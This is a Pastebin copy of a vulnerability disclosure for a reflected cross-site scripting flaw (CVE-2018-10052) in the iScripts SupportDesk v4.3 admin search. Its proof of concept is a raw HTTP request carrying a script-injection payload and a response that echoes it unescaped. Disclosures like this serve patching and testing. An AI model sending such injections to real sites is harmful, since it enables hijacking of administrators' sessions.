Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Exploit title: iScripts SupportDesk v4.3 - XSS via the getInteligentSearch() Admin Panel
- # Date: 11/04/2018
- # Exploit Author: ManhNho
- # Vendor Homepage: https://www.iscripts.com
- # Software Link: https://www.iscripts.com/supportdesk/
- # Demo Link: https://www.demo.iscripts.com/supportdesk/demo/admin/adminmain.php
- # Version: 4.3
- # CVE: CVE-2018-10052
- # Tested on: Windows 10 / Kali Linux
- # Category: Webapps
- #1. Description
- -----------------------------------------------------
- iScripts SupportDesk v4.3 has XSS via the getInteligentSearch() function parameter in Admin Panel.
- #2. Proof of Concept
- -----------------------------------------------------
- Request:
- POST /supportdesk/demo/admin/inteligentsearchresult.php HTTP/1.1
- Host: www.demo.iscripts.com
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: en-GB,en;q=0.5
- Accept-Encoding: gzip, deflate
- Referer: https://www.demo.iscripts.com/supportdesk/demo/admin/adminmain.php
- Content-Type: application/x-www-form-urlencoded
- Content-Length: 98
- Cookie: __utma=227100805.298811387.1522637403.1523415936.1523431492.7; __utmz=227100805.1522637403.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); messagesUtk=9ae2fcc5306f4d9c8d433f0f58efb968; PHPSESSID=44f6a6jfopm97kfrv7ccsfqub2; __utmc=227100805; __utma=129714457.1603653646.1523416273.1523416273.1523416273.1; __utmc=129714457; __utmz=129714457.1523416273.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=227100805; hs-messages-is-open=false
- Connection: close
- Upgrade-Insecure-Requests: 1
- txtinteligentsearch=%22%3E%3Cscript%3Ealert%28%271%27%29%3C%2Fscript%3E&btninteligentsearch=Search
- Response:
- HTTP/1.1 200 OK
- Date: Wed, 11 Apr 2018 07:41:19 GMT
- Server: Apache
- Expires: Thu, 19 Nov 1981 08:52:00 GMT
- Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
- Pragma: no-cache
- Connection: close
- Content-Type: text/html
- Content-Length: 70324
- ...
- <form name="frminteligentsearch" id="frminteligentsearch" action="https://www.demo.iscripts.com/supportdesk/demo/admin/inteligentsearchresult.php" method="post">
- <div class="intelligentsearch"><input type="text" name="txtinteligentsearch" id="txtinteligentsearch" class="topsearch_input width1" value=""><script>alert('1')</script>">
- ...
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement